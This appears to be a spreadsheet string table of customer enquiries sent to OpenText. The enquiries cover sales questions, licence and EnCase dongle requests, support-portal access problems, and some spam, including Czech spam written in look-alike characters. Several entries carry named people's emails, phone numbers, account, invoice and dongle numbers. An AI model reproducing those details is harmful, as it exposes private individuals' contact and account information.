    <t xml:space="preserve">So, on your trial request for SSH for exceed, I fill out the form and submit and it says that industry is a required field. However, on that page, that field does not exist! </t>
  </si>
  <si>
    <t>We are trying to do the Cutover/Rollover Processing but system is creating 2019-1 and 2019-2 parts when we only need one.  Need assistance asap to get this fixed.</t>
  </si>
  <si>
    <t>Good morning, I had taken a number of courses back in 2013-2015 and have misplaced the certificates for the CS-15 training courses and have been asked if I could provide copies of the completed training taken.  Would you be able to provide a electronic copy of the certificates?  Thanks in advance for your time and help.</t>
  </si>
  <si>
    <t>I received an email from OpenText a couple days ago with ACTION REQUIRED / Discount Tire / ERROR: Translation Data Error. I cannot figure out which order this applies to. I have never logged into OpenText before so I created an account to contact support. Which then sent me the email to confirm my address which I did. But, when I try to go to support I come to the page that says "No Access, we're sorry your account doesn't grant you access to this resource." Underneath that it says, "Almost There, Our records indicate that you have registered for access to My Support but have not yet confirmed your email with us." I have requested a confirmation email multiple times and confirmed it multiple times as well, but still cannot access support._x000D_
I just need a little more information from the email that I received so that I can determine which order this apples to._x000D_
I'm not sure if this was an invoice or an ASN.  If I could get more information like the ISA control number, invoice number, BSN02 number, etc. then I could find the order to correct and resend._x000D_
Thank You,_x000D_
Lee Aldridge</t>
  </si>
  <si>
    <t xml:space="preserve">I'd like someone to reach out to me via email to set up a call to discuss my companies needs the the possibility of setting up a demo with my team. Please email first to set up the call as I will not answer unknown phone numbers. </t>
  </si>
  <si>
    <t>I'm looking for a efax solution comparable to Biscom</t>
  </si>
  <si>
    <t xml:space="preserve">We are looking to potentially transfer our services </t>
  </si>
  <si>
    <t>Hello,_x000D_
Can you please send the new Exstream keys (expires 3-31-20)?_x000D_
We normally update the keys during the month of March, but have scheduled the update for February due to our March work load._x000D_
I am in the Acquiring (Merchant) division of TSYS currently running Version 9.5.305. We would also like a key to run the latest version of the software (16.4?) to prepare for upgrading._x000D_
If you are planning on sending the keys to the same distribution list as last year, I am included in that list._x000D_
Please feel free to contact me if you have any questions or concerns._x000D_
_x000D_
Thank you._x000D_
_x000D_
Randy Guthridge_x000D_
MAS &amp; Merlin Development_x000D_
TSYS Acquiring Solutions_x000D_
Work Phone 706-644-2551_x000D_
Email: rguthridge@tsys.com</t>
  </si>
  <si>
    <t xml:space="preserve">On 1/25/19, Nancy McBeth submitted a request on my behalf and I've heard nothing back as of yet.  I created an account, and can't access the support link, to check status of the request. _x000D_
_x000D_
</t>
  </si>
  <si>
    <t>I'm upgrading my workstation from a windows 7 to a windows 10 computer._x000D_
How do I install your program into the new system? Please advise</t>
  </si>
  <si>
    <t xml:space="preserve">I have the following dongles in my possession, they are a part of a larger account which is managed by another team. I need access to download software updates in the support portal (latest EnCase V7)._x000D_
EnCase_x000D_
G2002040397(2-2040397)_x000D_
G2002049649(2-2039649)_x000D_
G2002040395(2-2040395)_x000D_
G2002040236(2-2040236)_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi Team_x000D_
_x000D_
I am with Wells Fargo Division of Application Products Center of Excellence (APCoE), responsible for researching and identifying latest patches/ releases for 3rd Party Vendor products within the Product Management catalog._x000D_
This exercise is being performed on a Quarterly Cadence for all 3rd Party products and the objective is to keep Wells Fargo's environment up-to date and safe._x000D_
_x000D_
Could you please let me know the latest version and release date for netD (Internet Daemon, FTP (File Transfer Protocol) and HostExplorer Print Services_x000D_
_x000D_
Please provide above 3 Products information with release dates._x000D_
</t>
  </si>
  <si>
    <t>Bonjour,_x000D_
_x000D_
Nous sommes actuellement à la recherche d'une solution de GED responsabilisant entre autres les collaborateurs du groupe ALTEN dans la gestion de leurs documents d'administration du personnel._x000D_
Est-ce qu'il serait possible de planifier rapidement une démonstration de ce que vous proposez ? _x000D_
_x000D_
Je vous remercie par avance pour votre retour._x000D_
_x000D_
Cordialement,_x000D_
Erica ABIA</t>
  </si>
  <si>
    <t xml:space="preserve">Good morning, _x000D_
I would like to be put in contact with the person responsible for the imaging services, I am budgeting my want list for the FY and I need information about the imaging services offered by open text. _x000D_
thanks </t>
  </si>
  <si>
    <t>Try to set up my account to be able to pay on our account (867099).</t>
  </si>
  <si>
    <t>Accès to customer service portal</t>
  </si>
  <si>
    <t xml:space="preserve">Good Morning,_x000D_
I was hoping to speak with someone regarding set up of an account for right fax. Our company currently has integration with your right fax product but its always been through our clients we partner with. We now have a client who would like us to work directly with you so I would appreciate a quick discussion._x000D_
Thanks_x000D_
Mike_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">I’ve a customer from automotive sector which is interested on buying a EDI which integrates with Sap business one. _x000D_
I would like to know some information from your side._x000D_
_x000D_
1)	How does it work with Business One? Is an Addon? _x000D_
2)	Has the following functionalities: _x000D_
a.	Delfor _x000D_
b.	Delgit_x000D_
c.	 ASN _x000D_
d.	Invoice _x000D_
3)	Its compatible with Hyundai and PSI?_x000D_
4)	How do the licensing works? And costs? _x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi!_x000D_
I'm a KPMG employee and i want to download the latest version of Encase. I've got a transaction number. SC2004545+R19-FEB-18 07:02:44. Please help me to grant an access </t>
  </si>
  <si>
    <t>We doing an evaulation for a new DMS here in munich for MAN Financial Services (VW FS) and i would get in contact with your key account Manager that is responsible for Volkswagen Financial Services AG and/or Volkswagen AG.</t>
  </si>
  <si>
    <t xml:space="preserve">Hello Sir/Madam,_x000D_
Warm Greetings from Imagistack Software. _x000D_
We have gone through your website/social media, etc. It is great to know that you provide remarkable services in the field of Software development and many more. We believe we have the capabilities to help you implement your roadmap. We would like to collaborate with you for this._x000D_
_x000D_
I would like to introduce Imagistack Software. Imagistack Software is a software services company.  We have a creative team of technologists focused on doing high-quality work.  We do cutting-edge work for companies in Europe and USA._x000D_
_x000D_
We Provide solutions For: _x000D_
Cloud Computing, and DevOps_x000D_
Big Data_x000D_
Software Testing_x000D_
Mobile apps (cross-platform, native)_x000D_
Rapid Web Development_x000D_
_x000D_
We have also attached a brochure with details of our software services offerings. We would appreciate if you can please take a look and give us an opportunity to collaborate with your company. We would like to work with you and help you implement the roadmap for your company. Looking forward to hear from you and discuss further._x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Please reach me on above mentioned contact details for all(Goods &amp; Services Tax) related services.</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Sir,_x000D_
_x000D_
I have browsed through your company website and I am interested in the complete solution by OPEN TEXT for the business that I represent._x000D_
_x000D_
I am contacting you to ask for an offer on the complete solution for a business I develop on Romania. This is an archive and digitization center and will offer services B2B consisting in picking up all the files, digitizing them and store them physically on the shelves but also as scanned files on local storage and cloud storage. _x000D_
_x000D_
This business needs are to :_x000D_
_x000D_
- scan documents and storage them using attributes and safely manage all the work flow _x000D_
- have 3-4 local users who will have full access to scan files and manage the storage._x000D_
- provide an online portal for all the companies who will provide us their files in order to access them anytime _x000D_
- include barcode scanner for managing the stored files in the archive center_x000D_
- have any available modules that would help document management_x000D_
_x000D_
Another reason I am contacting you directly and ask for your help and an offer is because the company I have opened is not VAT payable and everything I buy from Romania is with VAT. Only if I acquire software and hardware from abroad, I can pay directly without VAT and of course I can afford to pay more. This is why I am contacting you directly and ask for an ofer._x000D_
_x000D_
The offer needed is part of the project documentation I need to submit in maximum two days. This is why I need your help._x000D_
Please call/e-mail me with the possibilities and instructions on how to proceed. _x000D_
_x000D_
Awaiting your soonest reply,_x000D_
Thank you very much,_x000D_
_x000D_
Lucian Moldovan_x000D_
</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
My name is Borja and I work as a Business Development Manager for Spain Region at GDOC (currently silver partner)_x000D_
_x000D_
Yesterday I created an account in OT but I did not check the option "Request full access to My Support" I requested access some minutes ago writing "Partner LearnTrack" in the field "Product Line" and I am not sure if that's the correct way._x000D_
_x000D_
In any case, I need full access to "My Support"_x000D_
_x000D_
Thanks in advance for your answer_x000D_
_x000D_
Borja</t>
  </si>
  <si>
    <t>Hi, I have 2 Encase dongles allocated to me - G3002093707 &amp; G3002088658.  The first works fine with the new 8.08 update, but my second dongle does not.  Can someone check G3002088658 for me, to make sure it has an up to date licence? I am also having problems with accessing the online Support section of my account, and seem to be going round in circles with the webpage asking for email verification._x000D_
_x000D_
Thanks_x000D_
David</t>
  </si>
  <si>
    <t xml:space="preserve">I have a question regarding the features of your CMS solution? Could we schedule a 15 minutes call? Best, Bouke </t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
My name is Praveen Kumar and I am a Business Systems Analyst at NVIDIA Corporation._x000D_
_x000D_
We are looking for an Accounts Payables automation solution, and would like to find out more about your "Vendor invoice management" solution._x000D_
_x000D_
We would appreciate if someone from your team can contact us and give an overview of the product._x000D_
_x000D_
Thanks &amp; regards_x000D_
Praveen</t>
  </si>
  <si>
    <t xml:space="preserve">We are looking for an SAP integrated archiving solution (SAP Archive Interface) and I found IXOS .  What information do you need to create an offer? </t>
  </si>
  <si>
    <t xml:space="preserve">Hi, _x000D_
I want to ask about Opentext VIM features,_x000D_
_x000D_
1. How you do invoice verification? is there like two-way matching or three-way matching?_x000D_
2. Does SAP need to send PO and GR to opentext VIM in order to verify and validate invoice's data?_x000D_
3. Does Opentext able to automate posting in SAP or just until create park number for SAP?_x000D_
4. Does Opentext allow user to create document that will be used to validate invoice verification?_x000D_
5. Does it have mobile application for approval purposes?_x000D_
</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
I'm looking for more information on the Captiva Mobile Capture SDK._x000D_
_x000D_
Joe</t>
  </si>
  <si>
    <t>Hi, _x000D_
_x000D_
I am exploring architectural options for one of my customers to integrate SAP Cloud for Customer (C4C) with a document management system to capture and centralize content on opportunity management. _x000D_
_x000D_
I understand that OpenText has a solution with xECM, including UI integration and SSO, but I cannot find detailed references on the architectural/system requirements or on how to setup the integration. _x000D_
_x000D_
Could you please advice whether the integration is still supported and if so, point me in the direction of (preferably technical) documentation? _x000D_
_x000D_
Thx in advance &amp; kind regards, _x000D_
_x000D_
Michael van Geet. _x000D_
Michael.van.geet@ittree.be</t>
  </si>
  <si>
    <t>Need your support to troubleshoot Documentum repository access issue.</t>
  </si>
  <si>
    <t>Sehr geehrte Damen und Herren, wir befinden uns aktuell in der Auswahlphase eines DMS/ECM. Hierzu möchte ich Sie bitten, mir Information, welche über die auf Ihrer Website bereits vorhanden, zukommen zu lassen. Gerne kann ich Ihnen auch ein Pflichtenheft (welches aktuell in Bearbeitung ist) zukommen lassen, damit Sie prüfen können, in wie weit Ihre Lösung für uns passen könnte. _x000D_
_x000D_
Schöne Grüße_x000D_
Pascal Böttcher</t>
  </si>
  <si>
    <t>úžasně Ⅴ pṛvṇí ɗeṣíṭce zabodovaḷу і ḥrady Hoꭒṣкa a Кoṣṭ. Ṃeȥі ṇеjlákaṿěǰsí мísta Čеṣké rеpuḅlіⱪy patří ꭒž ṭṛaɗіĉṇĕ i ṿоdṇí ṇảdṛž Lіpṇo nеᶀo Рroрaṣṭ Мacocḥa. Кažɗý ȥe ⱬмíṇěných cíḷů lіɗе ⅴlоni ȥadali do apliⱪacе Maрy.cȥ рřiblіžṇḝ̱ 70 000кṛảt.</t>
  </si>
  <si>
    <t>Hello Guys,_x000D_
_x000D_
Can I have the trial exceed version 2 weeks?</t>
  </si>
  <si>
    <t>Yan Cheng and Bob Murphy who were our contact points left the company. I have an urgent requirement from client. Please connect me to the sales team.</t>
  </si>
  <si>
    <t xml:space="preserve">Hello and Good Day_x000D_
 _x000D_
I am Max,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t>
  </si>
  <si>
    <t>Dear responsible, _x000D_
_x000D_
We would like to speed the business up about electronic invoicing in Mexico. And we think that you have deep expertise in Mexico B2B markets. _x000D_
_x000D_
Best regards,_x000D_
Ersin.</t>
  </si>
  <si>
    <t xml:space="preserve">I was issued an EnCase dongle which was renewed but the license is not updating. </t>
  </si>
  <si>
    <t>Discuss pricing for scan and fax capture with OCR/ICR.  Need to discuss software solution and pricing.</t>
  </si>
  <si>
    <t>Sweet - y'all are so embarrassed of your crapware that you hide basic documentation behind a paywall.  Nice to know the company is too flaky to be included in product selection.</t>
  </si>
  <si>
    <t>I would like to get more information on Email archiving and legal holds. Please provide a contact that can help me with this request. Thanks</t>
  </si>
  <si>
    <t>Em quase tudo.</t>
  </si>
  <si>
    <t>I want to know the Professional Services Fees, other costing details</t>
  </si>
  <si>
    <t xml:space="preserve">Faxing solution with a desktop driver_x000D_
</t>
  </si>
  <si>
    <t>Please have requested from the other week information about an EnCase eDiscovery license and how it works with relativity._x000D_
_x000D_
But I have no answer, can you help me ??</t>
  </si>
  <si>
    <t>We might be interested in your tool for surveying callers via their cellphones. Can you provide basic pricing please? We have a slim to nonexistent budget.</t>
  </si>
  <si>
    <t>I would like to talk to someone reference your "On Demand" training for EnCase Forensics._x000D_
If someone could call me that would be great!_x000D_
Thanks, Jake</t>
  </si>
  <si>
    <t>Looking to engage someone in discussions about SuccessFactors Extended ECM platform. We had demonstrations by John Trainor in 2017 but are ready to move the project forward now.</t>
  </si>
  <si>
    <t>Union County NC (PIN 407116) would like to purchase 3 additional licenses.  currently their pin has 34 licenses.  They would like a new license file that includes the 3.  Thank-you.</t>
  </si>
  <si>
    <t>OK I have at least one (maybe two) ACTIVE tickets with support and now suddenly I am unable to reach the form where I request a new ticket.  Just curious what is going on.   I am actually a part of Experian based in San Diego but our headquarters is in Costa Mesa and I didn't see either of those in the Company above pull down hints, so I just put McKinney TX since we do have a data center there that I use and where the server that has EoD on it is located....</t>
  </si>
  <si>
    <t>We would like pricing and information about Conflicts Check  in the Legal Key software.  We have about 75 attorneys.  Our main office is in New York, NY and we also have smaller offices in Paris, London, Seoul and DC.  Thank you.</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
We are currently looking for a solution that will allow our lawyers to send faxes thropugh their computer.  Around 130 users._x000D_
_x000D_
Thank you,</t>
  </si>
  <si>
    <t>By letting me to do dojo.</t>
  </si>
  <si>
    <t xml:space="preserve">I'm exploring potential alternates to our document control system. We need a system that is FDA compliant, has signature sign off and storage for approximately 200GB of data. </t>
  </si>
  <si>
    <t xml:space="preserve">I would like to speak with a sales representative about OpenText as a potential use for document management system for an in-house corporate legal department. </t>
  </si>
  <si>
    <t>úžasně Samоȥřеjмоṣṭí jе і dоpоṛսĉoṿání ṇеjḅližsích rеstaսṛací, ḥоteḷů neḅo zasṭảṿек мěstṣké ḥrоᶆaɗṇe dоpṛaṿу.</t>
  </si>
  <si>
    <t>We need to use this service to send out files to another doctor. This is urgent that we do this and we are unable to login with our password on record. We then need to upload a zipped file to the website and send it out ASAP. Thank you for your attention to this issue.I can be reached at 508-687-9950 or at info@marthasvineyardendo.com</t>
  </si>
  <si>
    <t>Hi, I'm unable to register an account for OpenText. I'm providing application support on ERMS which uses the OpenText platform and am going to need access in order to manage tickets within OpenText.</t>
  </si>
  <si>
    <t>Hello.  We use Visual Mfg. Version 7.12, and I need to activate several copies of Gupta Report Builder.  I believe the version that is included is RepBi52  It includes a Gupta Report Builder Test Drive, but when I attempted to do this, it says that time has expired.   Thank You.</t>
  </si>
  <si>
    <t>Inquiry or RFP for document management systems</t>
  </si>
  <si>
    <t xml:space="preserve">Bonjour,_x000D_
Je vous contacte via votre site web dans l'espoir d'obtenir le contact commercial en charge de notre compte. Notre précédente commerciale était Caroline PERRET. Elle a quittée votre société en 2017 et je suis depuis, toujours dans l'attente d'une communication de votre part en ce qui concerne son successeur._x000D_
La société Filhet-Allard est en pleine réflexion sur la pérennité du produit StreamServe au sein de votre catalogue produit et au sein de notre catalogue de services DSI._x000D_
Merci de me recontacter au plus vite pour que l'on puisse avancer sur ces sujets._x000D_
Cordialement,_x000D_
_x000D_
Jean-Michel MAISONNAVE_x000D_
Direction des Systèmes d'Information _x000D_
GIE Filhet-Allard_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>We are planning to propose OpenText Extreme as our integrated customer correspondence software. We need to know, what will it take to integrate it with our COTS (Commercial Off The Shelf) product.</t>
  </si>
  <si>
    <t xml:space="preserve">Requesting salesperson to contact me regarding an opportunity for a RightFax Server for a DoD JITC customer, Wright Patterson Air Force Base. </t>
  </si>
  <si>
    <t xml:space="preserve">Looking to obtain a trial Hp Connector license ASAP. </t>
  </si>
  <si>
    <t xml:space="preserve">Need latest patch information and downloads.  </t>
  </si>
  <si>
    <t>I need an invoice copy, can I obtain it from the website? It was paid on 1.22.19 in the amount of 359.58</t>
  </si>
  <si>
    <t>We are currently gathering information for a 5015.02 certified records management Solution for the Defense Health Agency. I'm currently in and out of the office, so email correspondence would be preferred initially.</t>
  </si>
  <si>
    <t>Questions about E-Discovery plan.</t>
  </si>
  <si>
    <t>Hello_x000D_
_x000D_
We do have a few questions regarding the ticket 4073279 from last week._x000D_
_x000D_
1. Releasemanagement:_x000D_
Whats the process of Open Text to inform Ricoh Schweiz AG about new versions of Rightfax that include important bugfixes?_x000D_
_x000D_
2. At our customer Inselspital we are running two Rightfax Servers in a cluster. Do you know a possibility to monitor them? Our monitoring tools doesn't work in a cluster installation. So we don't get an information when something is wrong with Rightfax and we have to wait for the Customer complains. This is not ideal. Maybe it is possible to Trigger the "Scheduled to be sent" Tasks or something like this? Do you have any experiences with such an setup that you can recommend?_x000D_
_x000D_
Thanks in advance for your further support and Feedback._x000D_
_x000D_
Best regards_x000D_
_x000D_
Patrick Trautmann_x000D_
Ricoh Switzerland</t>
  </si>
  <si>
    <t>I need to know if there are any client implementations in Peru or in the Latinoamerica region.</t>
  </si>
  <si>
    <t>We are planning on a Request for Information for a new (e)DMS _x000D_
Could you pls provide me with contact data, so we can invite you in tehn RFI</t>
  </si>
  <si>
    <t>I want to get a Certification with OpenText : Content Server._x000D_
I need to know the road toward getting this certification and cost.</t>
  </si>
  <si>
    <t xml:space="preserve">Jowkar </t>
  </si>
  <si>
    <t>Hi recently purchased Your NFS Gateway Access Solution recently, like a few months ago. We were on track to have it setup but then got derailed; I'm picking the project back up and would like to ask some specific questions. Is there someone I can get in contact with in regards to the NFS gateway Solution please ?</t>
  </si>
  <si>
    <t>Can you please explain how I can toggle between our QA and Production environments with the application? I am assuming the application reads an INI file to select the server, but not sure. Thanks.</t>
  </si>
  <si>
    <t>I have recently been asked to provide support for the application and to create a repeatable purge process that complies with our retention standards. I would like to understand the impact of attributes for document type (e.g., default storage type, retention days, maximum versions, maximum sub-versions, versions to keep, keep criteria) on retention of a document. We also have Record Codes associated with a document that have retention (years) and event types (that determine how to calculate the delete date for a document.) I need to understand how these work together and how the STORMAN utility for purging documents work with both too. I have been unable to find any documentation from my predecessor, so if it is available, I can reference it as well to glean the answers to my questions. Thank you for your help.</t>
  </si>
  <si>
    <t>Hi, I'm Nikko and a new joiner. Upon accessing the Employee Onboarding Guide, I was able to access the Day One Introduction to IT, however, can’t complete the Ethics and Code of Conduct and learning Central related – Onboarding Learntrack and Compliance Training due to access error. Per Learning Central Team, it looks like I do have a password syncing problem. And will need to contact IT group to further investigate &amp; resolve this problem. However, still encountering the same error - after trying to remediate the concern.</t>
  </si>
  <si>
    <t>The course DF120 - Foundations in Digital Forensics with EnCase is intended for encase v7 and i need the same course contents for encase v8 ,so which course should i take ?</t>
  </si>
  <si>
    <t>Getting a server error _x000D_
on the customer support login page</t>
  </si>
  <si>
    <t>I got this information that the ticket 1-3421146666 has been closed._x000D_
I don't have any idea of what is the conclusion._x000D_
I didn't get any comment_x000D_
Please email me the conclusion of this ticket with a comment_x000D_
Best regards._x000D_
M.lallemand Romain</t>
  </si>
  <si>
    <t>Hello! I can't activate my EnCase dongle to encase v8.08. Dongle number is G2002078582 and the licence is valid to 2019-09-24. Is there something wrong with my computer settings or I just do not understand something?</t>
  </si>
  <si>
    <t>Hello, I want to know the price of the platform because we want to implement them in the company, as we work with the data it is important to show our clients their data and that they can work with them waiting for a quick response says goodbye._x000D_
_x000D_
Roberto F.</t>
  </si>
  <si>
    <t>Gibt es eine für Windows 10 freigegebene Version des OpenText Imaging Viewers? Wir setzen aktuell die Version 10.0.0 ein um im Rheinmetall Konzern die Dokumente im SAP zu betrachten. _x000D_
Mit freundlichen Grüßen_x000D_
Thorsten Baumann</t>
  </si>
  <si>
    <t xml:space="preserve">Ich bitte höflich um Zusendung der Vertragskopien zu folgenden Rechnungen, die durch die Open Text UK Ltd., Thames Valley Park, Reading, Berkshire, UK ausgestellt und zugesandt wurden:_x000D_
_x000D_
1.) Billed Account: 132-4358_x000D_
Invoice No. 07450211901_x000D_
100 GBP_x000D_
_x000D_
2.) Billed Account: 335-9350_x000D_
Invoice No. 07652841901_x000D_
700 GBP_x000D_
_x000D_
3.) Billed Account: 034-0355_x000D_
Invoice No. 07630061901_x000D_
100 GBP_x000D_
_x000D_
Vielen Dank und freundliche Grüße_x000D_
Uwe Philippi_x000D_
</t>
  </si>
  <si>
    <t>Recently purchased new forensic laptop(s) with EnCase v8.07.  Need corresponding new certificates for dongle(s) # G3002086946 and G3002086941. (Both were previously only used with v7.)</t>
  </si>
  <si>
    <t>We will be performing a system update of our ibm server.  Our ibm support technician noticed bizmanager uses java 6, but needs to use java 7 or 8 to perform the upgrade.  Are we able to update java on our end or will it cause issues?  What do we need to do to get bizmanager to java 7 or 8 instead of 6?</t>
  </si>
  <si>
    <t>My Access to the eDocs support area was closed, because of the missing software maintenance. Unfortunately our partner ImageWare AG can't extend the maintenance contract, because they waiting for an new offer from your sales (because licenses were reduced)_x000D_
_x000D_
I would be grateful if you could reactivate my access to the support area in the meantime._x000D_
_x000D_
Regards,_x000D_
Tobias Kaufmann</t>
  </si>
  <si>
    <t xml:space="preserve">International Conference on Endocrinology, September 02 - 03, 2019, Berlin, Germany._x000D_
Euroscicon Ltd., UK is very happy to extend a warm welcome to the dignified and distinguished Nobel lecturers, speakers, delegate and Endocrinology professionals, Specialists, Endocrinology Specialists from around the world, for attending Twelfth Edition of International Conference on Endocrinology to be held September 02 - 03, 2019 in Berlin, Germany._x000D_
The theme of the conference “Bridging excellence in Endocrinology, Diabetes &amp; Metabolism” aims to bring together leading Endocrinology Professionals,  Endocrinologist, Endocrinologist Specialists, Endocrinology  administrators, Researchers, policy makers and Academicians, including Nobel Laureates to exchange and share their experiences and research results about all aspects of Endocrinology._x000D_
Join us for two most extensive and interesting days of discussing contemporary Endocrinology Research. We invite you to contribute and help us to shape the conference through submissions of your research abstracts, papers and e-posters. Also, high quality research contributions describing original and unpublished results of conceptual, constructive, empirical, experimental, or theoretical work in all areas of Endocrinology are cordially invited for presentation at the conference._x000D_
For more information Visit our website _x000D_
Regards,_x000D_
Jenny Jackson | Program Director_x000D_
EuroSciCon Ltd    _x000D_
40 Bloomsbury Way _x000D_
Lower Ground Floor _x000D_
London, United Kingdom      _x000D_
WC1A 2SE        _x000D_
E-mail: endocrinology.2018@yandex.com_x000D_
WhatsApp:+442382146717_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Messieurs,_x000D_
_x000D_
Le groupe TCL est déjà client de la branche chinois de Opentext. Nous voudrions savoir si dans le cadre la branche européen (TCL EUROPE), l'assistance tecnique pour l'implemnation de la facturation electronique EDI pourrait être effectuée par l'entité française de opentext. Je vous invite à me contacter par téléphone sur le sujet. Je vous prie d'agréer mes salutations sincères. _x000D_
Aritz OJEMBARRENA / Sales controller _x000D_
TCL EUROPE_x000D_
9-15 rue Rouget de Lisle - 92130 Issy les Moulineaux - France_x000D_
T +33 01 78 16 49 40_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Bonjour, _x000D_
_x000D_
Je m’appelle Seck Adama je me permets de vous contacter afin de savoir si votre entreprise recrute des Alternants en tant que assistante de direction pour un contrat de professionnalisation de 12 mois._x000D_
_x000D_
Je reste à votre disposition pour tout renseignement complémentaire._x000D_
_x000D_
Bien Cordialement _x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">i work at indonesia as a examiner, i have dongle encase_x000D_
i want to reinstall my software (encase 7.1)_x000D_
but i dont have installer_x000D_
can u give me a link for download it_x000D_
thanks_x000D_
</t>
  </si>
  <si>
    <t>I would like to know to whom I should notify in order to close our 2 EDI mailboxes. We no-longer deal with Honda and they are not needed now. _x000D_
Many thanks_x000D_
Stephen Withington</t>
  </si>
  <si>
    <t>We are looking for a redacting software and came across your product. Regarding the same we have the following queries : _x000D_
1. If API/SDK is available,Can it work offline and without manual intervention? _x000D_
3. What will be the pricing for unlimited user access?_x000D_
4. What are the supported formats that can be Redacted?_x000D_
Please treat this as urgent</t>
  </si>
  <si>
    <t>Hello! _x000D_
_x000D_
I am Simon from ReCREWter Company! We started our project of delivering best IT Specialist to new projects and firms in January 2018, but we have more than 10 years of experience in Recruitment processes. _x000D_
_x000D_
I found few job offers on you site connected with SAP positions and thought that you might be interested in cooperation with mine company! As we had many of candidates which are suitable with your offers and would like to work with german language because they are good in it. They are ready to travel around Germany and not only._x000D_
_x000D_
We always take care about our Customers needs and we're looking just for the best Specialists on the market. _x000D_
_x000D_
If you might be interested in speaking with me about helping you in delivering people to your projects please do not hesitate to contact me! I would be honoured to chat with you about possible cooperation!_x000D_
_x000D_
Have a nice day,_x000D_
Szymon Madry_x000D_
ReCREWter</t>
  </si>
  <si>
    <t>Cannot complete Registration Confirmation_x000D_
Your User ID: mariacariza.salangsang@lionco.com_x000D_
An error occurred updating password.</t>
  </si>
  <si>
    <t>Shawbrook are looking at strategic partners to provide potential Enterprise Customer Communications Management capabilities and would like to engage with OpenText to discuss requirements</t>
  </si>
  <si>
    <t>Dear all,_x000D_
I participate on the Training in Germany from 4. of Feb till 8. of Feb._x000D_
Can you please provide me Information about Hotels not far from Munich Office._x000D_
Open Text Software GmbH_x000D_
Technopark 2_x000D_
Werner-von-Siemens-Ring 20_x000D_
85630 Grasbrunn_x000D_
Thank you in advance</t>
  </si>
  <si>
    <t>My name is Keith Tully and I am a partner at Real Business Rescue (part of Begbies traynor); one of the UK’s largest business recovery firms with 65 offices nationwide. We have an active website with lots of fresh, engaging content and I am always looking for mutually beneficial opportunities to associate our company with other successful websites like yourselves to offer my advice and experience to business owners and entrepreneurs in the form of creative content._x000D_
_x000D_
We are currently writing for a number of reputable publications and websites - which can be seen on the featured page of our site and we would like to produce regular business advisory content for your OpenText blog page if there was an opportunity to do so._x000D_
_x000D_
My personal specialities lie within taxes, financing a company, business recovery options, business exiting strategies, director support and consultancy and more general content around running a successful company._x000D_
_x000D_
We do like to socially share all content that is published as we feel it works to our mutual benefit to enhance each other’s brand. Most of our following are those in the business and finance sector, some US, but mostly UK._x000D_
_x000D_
My initial ideas that I could cover for OpenText are:_x000D_
_x000D_
•           GDPR challenges : how to maintain quality of information in corporate group structure_x000D_
•           Why small businesses should switch to cloud accounting_x000D_
•           Why analysing your competitors is crucial in winning online business_x000D_
_x000D_
Would be interested to hear your thoughts.</t>
  </si>
  <si>
    <t>Hello,_x000D_
Do you have information about your product "Opentext Content Suite (content services platform)"? I would like to see the global functionalities of the product. _x000D_
Could you send me product information?_x000D_
Thank you very much</t>
  </si>
  <si>
    <t>I would like to have an overview at the Enterprise Content Management product.</t>
  </si>
  <si>
    <t>I have verified my e-mail in order to get access to mysupport so that I can download the latest releases of Encase Forensic, but the site is not allowing me access and keeps redirecting me to verify my e-mail.</t>
  </si>
  <si>
    <t>Could you please assist me in Activating my Dongle V6 Licence. I try to activate this dongle but encountering problems in this. It is Dongle V6:17662266389</t>
  </si>
  <si>
    <t xml:space="preserve">Thankyou woman sister is a the most important beautiful and </t>
  </si>
  <si>
    <t>We are undertaking a project to move away from Windows Server 2008 now its due to be end of life. I have been asked to do some discovery for RKYV and have a list of questions to help us determine the upgrade path e.g if the server can be upgraded in place and the software will work or if it would need to reinstalled etc. Is the a support e-mail address I could send these question to?</t>
  </si>
  <si>
    <t>I need an assistance in registering the following dongle number DONGLE: 17662266389000429</t>
  </si>
  <si>
    <t>help in getting technical support AND contact me with Licensing Support to documentum software Rather than supporting a company of emc2 that was responsible for our support._x000D_
Taking the subject seriously because we do not have product licenses and that causes a problem in the work. thank you</t>
  </si>
  <si>
    <t>Want to register a Dongle</t>
  </si>
  <si>
    <t>Just for your information your certificate for tableau subdomain of guidancesoftware domain is shown to be expired ;-)</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
OpenText Connect_x000D_
_x000D_
_x000D_
No Access_x000D_
_x000D_
We're sorry, your account does not grant you access to this resource._x000D_
</t>
  </si>
  <si>
    <t>Brava,_x000D_
_x000D_
The dropdown bar within the Brava! Desktop TX disappeared while I was trying to utilize hotkeys. Please advise on how to get it back. Thanks._x000D_
_x000D_
Regards,_x000D_
David</t>
  </si>
  <si>
    <t xml:space="preserve">Thankyou woman sister sister and woman mom </t>
  </si>
  <si>
    <t>We are looking for a solution to manage our media and store in a space not less than 6 TB. Furthermore, we would like to receive a proposal via email as we are looking for different vendors.</t>
  </si>
  <si>
    <t>Dear Team,_x000D_
We would like to know the PDF licensing and pricing details for Open text imaging Web Viewer. Kindly help us on the same.</t>
  </si>
  <si>
    <t xml:space="preserve">Please send me an email address of your sales office in South Africa. Alternatively send me a list of your partners in South Africa._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Hello and Good Day_x000D_
 _x000D_
I am Sanjeev Yadav,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Sanjeev Yadav</t>
  </si>
  <si>
    <t>Good day,_x000D_
_x000D_
I require a account manager to discuss what OpenText offers in terms of DMS/ECM products and then quote on the offering. I am based in Johannesburg, South Africa. Can you put me in contact with such a person or company?_x000D_
_x000D_
Dawid</t>
  </si>
  <si>
    <t>Good day! I wont download EnCase Forensic Imager 7.10 (x64). Were is it?!</t>
  </si>
  <si>
    <t>Dear Sir,_x000D_
_x000D_
My customer would like to quote the following license. please help._x000D_
1. OpenText Exceed x 1_x000D_
_x000D_
2. OpenText Exceed x 10_x000D_
_x000D_
3. OpenText Exceed OnDemand x 1_x000D_
_x000D_
